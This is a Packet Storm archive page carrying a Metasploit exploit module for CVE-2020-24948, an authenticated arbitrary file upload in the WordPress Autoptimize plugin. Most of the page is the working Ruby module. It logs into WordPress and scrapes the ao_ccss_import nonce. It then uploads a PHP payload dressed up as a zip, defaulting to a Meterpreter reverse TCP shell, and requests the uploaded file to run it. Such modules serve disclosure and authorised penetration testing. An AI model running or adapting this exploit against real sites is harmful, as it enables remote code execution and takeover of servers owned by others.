what you don't know can hurt you

WordPress Autoptimize Shell Upload

WordPress Autoptimize Shell Upload
Posted Jan 8, 2021
Authored by Hoa Nguyen, Thien Ngo, Khanh Nguyen | Site metasploit.com

WordPress Autoptimize plugin suffers from a remote shell upload vulnerability. The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to remote code execution.

tags | exploit, remote, arbitrary, shell, php, code execution
advisories | CVE-2020-24948
MD5 | b411262c32d42ec1cbf7382e1a8f4a37

WordPress Autoptimize Shell Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(
info,
'Name' => 'Wordpress Autoptimize Authenticated File Upload',
'Description' => %q{
The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file,
allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
},
'Author' =>
[
'Khanh Nguyen - Suncsr Team', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
'Thien Ngo - Suncsr Team' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-24948'],
['EDB', '48770'],
['WPVDB', '10372']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Targets' => [['WP Autoptimize 2.7.6', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-08-24'))

register_options(
[
OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]),
OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil])
])
end

def check
check_plugin_version_from_readme('autoptimize','2.7.7')
end

def ao_ccss_import_nonce(cookie)
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_backend,'options-general.php'),
'cookie' => cookie,
'vars_get' => {
'page' => 'ao_critcss'
}
},5)

if res.code == 200
print_good("Found ao_ccss_import_nonce_code Value!")
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end

ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]
return ao_ccss_import_nonce_code
end

def exploit
username = datastore['USERNAME']
password = datastore['PASSWORD']
print_status("Trying to login as #{username}")
cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD'])
if cookie.nil?
print_error("Unable to login as #{username}")
end

vars = ao_ccss_import_nonce(cookie)
print_status("Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"

data = Rex::MIME::Message.new
data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')
data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')
data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
post_data = data.to_s
print_status("Uploading payload")

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
})

if res.code == 200
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end

print_status("Calling uploaded file #{filename}")
send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5)
end
end
Login or Register to add favorites

File Archive:

March 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    19 Files
  • 2
    Mar 2nd
    15 Files
  • 3
    Mar 3rd
    30 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close